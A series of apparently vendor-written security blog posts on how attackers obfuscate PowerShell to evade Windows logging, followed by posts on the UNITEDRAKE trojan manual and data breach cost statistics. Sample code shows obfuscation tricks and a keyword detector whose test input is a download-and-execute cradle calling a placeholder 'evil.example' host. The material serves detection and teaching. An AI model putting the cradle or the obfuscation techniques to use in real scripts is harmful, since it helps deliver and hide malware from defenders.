The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was a little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.
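To see why this defeats naive signature scanning, here’s a minimal Python stand-in for the same trick (the fragment values are my own illustration, not Invoke-Obfuscation output): the suspicious cmdlet name never appears whole in the script text, only fragments glued together at run-time.

```python
# Python stand-in for string-concatenation obfuscation: the cmdlet name
# is split into fragments and only assembled when the script runs.
fragments = ["Inv", "oke-Ex", "pres", "sion"]
cmdlet = "".join(fragments)

# A naive signature scanner reading the script text finds no match...
script_text = 'fragments = ["Inv", "oke-Ex", "pres", "sion"]'
print("Invoke-Expression" in script_text)  # False

# ...but the run-time value is the real thing.
print(cmdlet)  # Invoke-Expression
```

The same pattern-matching blind spot applies to any scanner that looks only at source text rather than at what the code evaluates to.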

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice the first part, $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4th, 15th, and 25th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The -join operator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke-Expression cmdlet.
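Both tricks translate directly into Python, which makes them easier to reason about. This sketch assumes the usual COMSPEC value of C:\WINDOWS\system32\cmd.exe; PowerShell is case-insensitive, so the mixed-case result still resolves to the IEX alias.

```python
# Analogue of $env:comspec[4,15,25]: pull characters out of a
# benign-looking string by index to spell a command alias.
comspec = r"C:\WINDOWS\system32\cmd.exe"
alias = "".join(comspec[i] for i in (4, 15, 25))
print(alias)  # Iex  (PowerShell aliases are case-insensitive, so this is IEX)

# Analogue of the format operator: positional fields like {1}{0} pull
# arguments in an arbitrary order, reassembling the keyword piecewise.
print("{1}{0}".format("EX", "I"))  # IEX
```

Neither snippet contains the literal string it produces, which is exactly the property the obfuscator is after.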

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could  see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Windows Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.
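The encoding idea itself is simple, and a short Python sketch (my own illustration, using a stand-in payload) shows why a plain-text scan comes up empty: the command line carries only hex digits, and the original text reappears only after decoding at run-time.

```python
# Sketch of encoding obfuscation: store the payload as hex so nothing
# in the logged command line matches a text signature.
payload = "Write-Host evil malware"
encoded = payload.encode().hex()

# The logged artifact is just hex digits -- no keywords to match on.
print("Write-Host" in encoded)  # False

# Only decoding recovers the original cmdlet.
decoded = bytes.fromhex(encoded).decode()
print(decoded)  # Write-Host evil malware
```

A defender would have to decode every plausible encoding (hex, Base64, binary strings, ...) before pattern matching, which is exactly the cost the attacker is imposing.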

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes (yeah, that guy) in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes moved to a more complicated logistic regression model — basically classifying PowerShell code into either evil obfuscated scripts or normal ones. He then trained his logit by looking deep into PowerShell’s parsing of commands — gathering stats for levels of nesting, etc. — to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!
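To get an intuition for the character-frequency signal, here’s a toy version (the two sample strings and the “special character” set are my own, and this is far cruder than Holmes’ parser-level features): obfuscated PowerShell leans heavily on quotes, braces, parentheses and plus signs, so even a crude ratio separates the two samples.

```python
# Toy character-frequency feature: what fraction of a script is made of
# punctuation characters that obfuscators lean on?
def special_char_ratio(script: str) -> float:
    specials = set("'\"`{}()+,;$")
    return sum(c in specials for c in script) / len(script)

normal = "Get-Process | Where-Object { $_.Handles -gt 100 }"
obfuscated = "&('In'+'voke-Ex'+'pression') (\"{1}{0}\" -f 'x','IE')"

print(round(special_char_ratio(normal), 2))
print(round(special_char_ratio(obfuscated), 2))
print(special_char_ratio(obfuscated) > special_char_ratio(normal))  # True
```

A real classifier would feed dozens of such features — nesting depth, operator counts, token entropy — into the regression rather than rely on one ratio.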

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

Lee Holmes’ machine learning model suggests that it’s possible to detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part II


This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.

A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. In this second part of the interview, we explore different ways to improve corporate data security, including security by design techniques at the development stage, deploying Windows 10s, and even labeling security products!

Learn more from Ofer by clicking on the interview above.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

PowerShell Obfuscation: Stealth Through Confusion, Part I


This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Lee Holmes given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go-to tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory, monitoring user activities at, say, the Security Operations Center or SOC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a WebClient object, calls its DownloadString method, and then executes the string contained in the remote web page. Something like the following:

Why would an ordinary user or even for that matter an admin do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look like a completely undecipherable word jumble.

PowerShell Logging    

Before we take our initial dive into obfuscation, let’s explore how events actually get logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then  turn on auditing for the  PowerShell command line. You can read more about it in this Microsoft document.

And then for even more voluminous logging, you can set policies in the GPO console to enable, for example, full transcription logging of a PowerShell session (below).

More PowerShell logging features in the Administrative Templates under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer  things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles} — to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer,  I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, fool analytics software to not trigger when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.

However, from my Windows Event Viewer,  I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is  represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers became very clever by making the malware signature itself invisible. That’s really the example I first started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware and has become a very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and DownloadString in the command line. It’s just not a normal user command, at least in my book.
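That detection is easy to sketch. Here’s a minimal Python version of the idea (the keyword list, threshold, and sample log lines are my own illustration, not a production rule): flag a logged command line when it contains the telltale WebClient/DownloadString pair.

```python
# Minimal keyword scan for the fileless "launch cradle": flag command
# lines containing at least two of the telltale download-and-execute terms.
SUSPICIOUS = ("webclient", "downloadstring", "invoke-expression")

def looks_like_cradle(command_line: str) -> bool:
    lowered = command_line.lower()
    return sum(kw in lowered for kw in SUSPICIOUS) >= 2

benign = "Get-ChildItem C:\\Users -Recurse"
cradle = ("IEX (New-Object Net.WebClient)"
          ".DownloadString('http://evil.example/payload.ps1')")

print(looks_like_cradle(benign))  # False
print(looks_like_cradle(cradle))  # True
```

Of course, this is exactly the kind of rule that the obfuscation in the next section is designed to slip past.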

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command line obfuscation techniques — and he’s got the beard to prove it! — to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.

I loaded his Invoke-Obfuscation app onto my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above WebClient.DownloadString fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.

Continue reading the next post in "PowerShell Obfuscation"

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I


This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.

A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer on data security since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

More NSA Goodness: Shadow Brokers Release UNITEDRAKE


Looking for some good data security news after the devastating Equifax breach? You won’t find it in this post, although this proposed federal breach notification law could count as a teeny ray of light. Anyway, you may recall the Shadow Brokers, which is the group that hacked the NSA servers, and published a vulnerability in Windows that made WannaCry ransomware so deadly.

Those very same Shadow Brokers have a new product announcement that also appears to be based on NSA spyware first identified in the Snowden documents. Bruce Schneier has more details on its origins.

(Way back in 2014, Cindy and I listened to Schneier speak at a cryptography conference, warning the attendees that NSA techniques would eventually reach ordinary hackers. Once again, Schneier proved depressingly right.)

Known as United Rake or UNITEDRAKE in hacker fontology, this is an advanced remote access trojan or RAT along with accompanying “implants” – NSA-speak for remote modules. It makes some of the admittedly simple RATs I investigated in my pen testing series look like the digital version of Stone Age tools.


How do we know how UNITEDRAKE works?

The Shadow Brokers kindly published a user’s manual. I highly recommend that IT folks who only know about malware by scanning the headlines of tech-zines peruse the contents of this document.

Forgetting for a moment that Evil Inc. is behind the malware, the 67-page manual appears on the surface to be describing a legit IT tool: there are sections on minimum software requirements, installation, deployment, and usage (lots of screenshots here).

Manage remote implants or modules from the UNITEDRAKE interface.

To my eyes, this is a detailed user’s manual that puts much business-class software collateral to shame. It’s the productized malware that we often hear about, and now we can all see it for ourselves. UNITEDRAKE will likely be sold on the dark web, and the manual is the teaser to get hackers interested.

I didn’t see all the capabilities explained that were implied in the screenshots, but there’s enough in the manual to convince the likely buyer that UNITEDRAKE is the real deal and worth the investment.

But It’s Still a Trojan

Once you read through the UNITEDRAKE manual, you see it’s essentially a RAT with a classic modern architecture: the client-side with the implants is on the victim’s computer, and it communicates to the hacker’s server on the other side of the connection.

Port 80 seems to be the communications channel, and that means HTTP is the workhorse protocol here —although raw TCP is mentioned as well.

In the RAT world, the client-side is the victim’s computer.

Scanning a few specialized websites, I learned that NSA implants such as Salvage Rabbit can copy data off a flash drive, Gumfish can take pictures from an embedded  camera, and Captivated Audience can — what else — spy on users through a laptop’s microphone. You can read more about this spy-craft in this Intercept article.

The NSA guys at least get credit for creative product naming.

The Prognosis

Obviously, the NSA was in a better position to install these implants than typical hackers. And it’s unclear how much of the NSA-ware the Shadow Brokers were able to implement.

In any case, with phishing and other techniques (SQL-injection, and say probing for known but unpatched vulnerabilities), hackers have had a good track record in the last few years in getting past the perimeter undetected.

Schneier also says that Kaspersky has seen some of these implants in the wild.

My takeaway: We should be more than a little afraid of UNITEDRAKE and other proven productized malware that hackers with some pocket change can easily get their hands on.

We never believed the perimeter was impenetrable! Learn how Varonis can spot attackers once they’re inside.

My Big Fat Data Breach Cost Post, Part I


This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

Data breach costs are very expensive. No, wait they’re not. Over 60% of companies go bankrupt after a data breach! But probably not. What about reputational harm to a company? It could be over-hyped but after Equifax, it could also be significant. And aren’t credit card fraud costs for consumers a serious matter? Maybe not! Is this post starting to sound confusing?

When I was tasked with looking into data breach costs, I was already familiar with the great Verizon DBIR vs. Ponemon debate: based on data from 2014, Ponemon derived an average cost per record of $201 while Verizon pegged it at $.58 per record. In my book, that’s an enormous difference. But it can be explained if you dive deeper.

After looking at one too many research papers, presentations and blog posts on the subject of data breach costs, I started to see that once you absorb a few underlying ideas, you understand what everyone is yakking about.

That’s a roundabout way of saying that this will be a multi-part series.

Averages Can Cause Non-Average Problems

The first issue to take up is the average of a data sample. In fact, this blog’s favorite statistician, Kaiser Fung, lectured us on this point a while back. When looking at a data set, a simple average of the numbers works well enough as long as the distribution of the numbers is not too skewed – that is, it doesn’t have a spike or clump at the tail end.

But as Fung points out, when this is not the case, the average leads to inconsistencies, as in the following hypothetical data set of breach record counts over two years:

Company    Records breached (2015)    Records breached (2016)
1          100                        150
2          200                        400
3          150                        300
4          225                        250
5          75                         100
6          1000                       1200
7          1500                       1000
8          8000                       1000
9          300                        400
10         175                        500
Average    1172                       530

For 2015, the average of 1172 is off by several multiples for seven of the ten companies! And if we compare this average to the following year’s average of 530, we could incorrectly conclude that breach counts are down.

Why? If we look at those seven companies, we see all their breach counts went, ahem, up.

This usually leads to a discussion of how numbers are distributed in a dataset, and to the median — the value below which half of the data falls — which is a better representation than the average, especially for skewed data sets. Kaiser is very good at explaining this.
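You can verify the point directly from the table above. This short Python check shows the mean being dragged around by the one mega-breach while the median moves with the majority of companies:

```python
# Mean vs. median on the hypothetical breach counts from the table:
# the mean is dominated by company 8's 8000-record spike, while the
# median tracks the typical company (whose counts all went up).
from statistics import mean, median

breaches_2015 = [100, 200, 150, 225, 75, 1000, 1500, 8000, 300, 175]
breaches_2016 = [150, 400, 300, 250, 100, 1200, 1000, 1000, 400, 500]

print(mean(breaches_2015), mean(breaches_2016))      # 1172.5 530 -- "down"
print(median(breaches_2015), median(breaches_2016))  # 212.5 400.0 -- up
```

The mean says breaches fell year over year; the median correctly says the typical company got worse.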

For those who want to get a head start on the next post in this series, you can scan this paper, which has the best title on a data security topic I’ve come across: Sex, Lies and Cyber-crime Surveys. It was written by those crazy folks at Microsoft. If you don’t want to read it, the point is this: for skewed data, it’s important to analyze how each percentile contributes to the overall average.

Guesstimating Data Breach Costs

How does Ponemon determine the cost of a data breach? Generally, this information is not easily available. However, in recent years, these costs have started to show up in annual reports for public companies.

But for private companies and for public companies that are not breaking breach costs out in their public financial reporting, you have to do more creative number crunching.

Ponemon surveys companies, asking them to rate the costs for common post-breach activities, including auditing & consulting, legal services, and identity protection fees. Ponemon then categorizes costs into whether they’re direct — for example, credit monitoring — or fuzzier indirect or opportunity costs — extra employee time or potential lost business.

It turns out that these indirect costs represent about 40% of the average cost of a breach based on their 2015 survey. These costs mean something, but they’re not really accounting costs. More on that next time.

Recently, other researchers have been able to get hold of far better estimates of the direct breach costs by examining actual cyber insurance claims. Companies such as Advisen and NetDiligence have this insurance payout data and have been willing to share it.

The cyber insurance market is still immature and the actual payouts after deductibles and other fine print don’t represent the full direct cost of the breach. But this is, for the first time, evidence of direct costs.

Anyway, the friendly people over at RAND — yes, the very same company who worked this out — used these data sets to guesstimate an average breach cost per incident of about $6 million – wonks should review their paper. This tracks very closely with Ponemon’s $6.5 million per incident estimate for roughly the same period.

Per incident cost data based on insurance claims. Note the Max values! (Source: RAND)

Before you start shouting into your browser, I realize I used an average above to describe a very skewed (and, as we’ll see, heavy-tailed) data set.

In any case, several studies including the RAND one, have focused on per incident costs rather than per record costs. At some point, the Verizon DBIR team also began to de-emphasize the count of records exposed, realizing that it’s hard to get reliable numbers from their own forensic data.

In the 2015 DBIR report, the one where they announced their provocative $.58 per record breach cost claims, the researchers relied on, for the first time, a dataset of insurance claim data from NetDiligence.

Let me just say that the DBIR’s average cost ratio is heavily influenced by a few companies with humongous breached record counts — likely in the millions — reflected in the denominator, and smaller total insurance payouts in the numerator. As we saw in my made-up example above, the average in this case is not very revealing.
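The arithmetic behind that claim is easy to demonstrate with made-up numbers (these payouts and record counts are invented for illustration, not from any dataset): dividing total payouts by total records lets one mega-breach crush the ratio, even though every individual small breach cost far more per record.

```python
# Total-payouts / total-records is dominated by the mega-breach in the
# denominator, yielding a pennies-per-record "average" that describes
# no individual company. All figures are invented for illustration.
payouts = [500_000, 750_000, 1_000_000]   # insurance payouts ($)
records = [10_000, 50_000, 50_000_000]    # records breached

per_record_overall = sum(payouts) / sum(records)
per_record_each = [p / r for p, r in zip(payouts, records)]

print(round(per_record_overall, 2))            # 0.04 -- pennies per record
print([round(x, 2) for x in per_record_each])  # [50.0, 15.0, 0.02]
```

Two of the three companies paid $15–$50 per record, yet the pooled ratio says four cents.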

Why not use multiple averages customized over different breach count ranges? I hope you’re beginning to see it’s far better to segment the cost data by record count: you look up in a table the costs appropriate for your case. And Verizon did something close to that in the 2015 DBIR to come up with a table of data that’s nearer Ponemon’s average for the lower tiers:

Ok, so maybe Verizon’s headline-grabbing $.58 per record breached is not very accurate.

Counting breached records provides some insight into understanding total costs, but there are other factors: the particular industry the company is in, the regulations it’s under, credit protection costs for consumers, and company size. For example, take a look at this breach cost calculator based on Ponemon’s own data.

Linear Thinking and Its Limits

You can understand why the average breach cost per record number is so popular: it provides a quick although unreliable answer for the total cost of a particular breach.

To derive the $201 average cost per record, Ponemon simply added up the costs (both direct and indirect) from their survey and divided by the number of records breached as reported by the companies.

This may be convenient for calculations but as a predictor, it’s not very good. I’m gently walking around the topic of linear regressions, which is one way to draw a “good” straight line through the dataset.

Wonks can check out Jay Jacobs’ great post on this in his Data Driven Security blog. He shows a linear regression beating out the simple Ponemon line with its slope of 201 — by the way, he gained direct access to Ponemon’s survey results. Jacobs’ beta is $103, which you can interpret as the marginal cost of an additional breached record. But even his regression model is not all that accurate.

I want to end this post with this thought: we want the world to look linear, but that’s not the way it ticks.

Why should breach costs go up by a fixed amount for each additional record stolen? And for that matter, why do we assume that 10% of the companies in a data breach survey will contribute 10% to the total costs, the next 10% will add another 10%, and so on?

Sure, for paying out credit monitoring costs for consumers and replacing credit cards reissued by litigious credit card companies, costs add up on a per-record basis.

On the other hand, I don’t know too many attorneys, security consultants, developers, or pen testers who say to new clients, “We charge $50 a data record to analyze or remediate your breach.”

Jacobs found a better non-linear model — technically log-linear, which is a fancy way of saying the record count variable has an exponent in it. In the graph below — thank you, Wolfram Alpha! — I compared the simple-minded Ponemon line against the more sophisticated model from Jacobs. You can gaze upon the divergence or else click here to explore on your own.

The great divergence: linear vs non-linear data breach cost estimates.
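To make the shapes of the two models concrete, here’s a sketch comparing a flat per-record line with a power-law curve. The coefficients below are stand-ins I chose for illustration, not Jacobs’ fitted values; only the $201/record slope comes from the Ponemon figure discussed above.

```python
# Linear vs. log-linear (power-law) breach cost models. In the power-law
# model cost = a * records**b with b < 1, each extra record costs less
# than the last, so the curves diverge as breaches get huge.
def linear_cost(records, per_record=201):
    return per_record * records

def log_linear_cost(records, a=2500, b=0.76):  # illustrative coefficients
    return a * records ** b

for n in (1_000, 100_000, 10_000_000):
    print(n, round(linear_cost(n)), round(log_linear_cost(n)))
```

Note how multiplying the record count by 100 multiplies the linear estimate by exactly 100, but the power-law estimate by only about 33 — that sub-linear growth is the whole point of the exponent.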

If you made it this far, congratulations!

In the next post, I hope all this background will pay off as I try to connect these ideas to come up with a more nuanced way to understand data breach costs.

Continue reading the next post in "My Big Fat Data Breach Cost Series"